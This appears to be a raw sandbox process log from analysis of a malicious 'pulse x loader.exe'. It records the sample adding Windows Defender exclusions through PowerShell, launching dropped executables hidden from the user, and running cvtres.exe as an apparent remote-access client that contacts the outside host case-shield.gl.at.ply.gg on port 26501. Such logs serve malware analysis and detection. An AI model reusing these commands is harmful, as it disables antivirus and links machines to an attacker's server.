C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\cvtresa.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mc1bvsrx\mc1bvsrx.cmdline"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES30CF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB7DF7A0D43D343BB9E62CDA4C8D62C7E.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
C:\Users\Admin\AppData\Local\Temp\cvtresa.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d13vlrac\d13vlrac.cmdline"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES45BE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5F505D7CD35B4E4493379B5A8DBF552B.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vnchxv0a\vnchxv0a.cmdline"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES58D9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFA2B155BFE28495FBEF636BD63F98BF.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jk0iba35\jk0iba35.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES65D9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC865B36F9CE17424AB4FD8CA0C5AAC8E1.TMP"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\by32ifag\by32ifag.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80B4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE047D346B5F649BD9950F3A65D9F04.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oyqnjcvp\oyqnjcvp.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES91AC.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4EF71ED814C1400BBAC02FF6BC341D.TMP"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\54dljrdb\54dljrdb.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7D4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD9A93F59C6274046AB86D045817B47AF.TMP"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bzpigqxz\bzpigqxz.cmdline"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA11.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF94C92117F409F8CAB372BF587B39E.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f4qxi0qt\f4qxi0qt.cmdline"
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE635.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD59C4322AFD54F64A55585C4165172C.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1zoyphjr\1zoyphjr.cmdline"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6BD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC98B123E02A0945A5B6756A807C99F6DB.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x4tddd3a\x4tddd3a.cmdline"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES195A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC14D7E0E7A4F9463589D340F9195070A8.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uwpv2pbb\uwpv2pbb.cmdline"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2BAA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4F34258A595A44A299E8D14E911FF6CB.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\agun3vry\agun3vry.cmdline"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4220.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4F0CAB8C316D4C5AAE71B651E5ADFFCB.TMP"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cwub4mdt\cwub4mdt.cmdline"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES57AB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC40067C97CD5D4804BF1E795BEEDDA54B.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
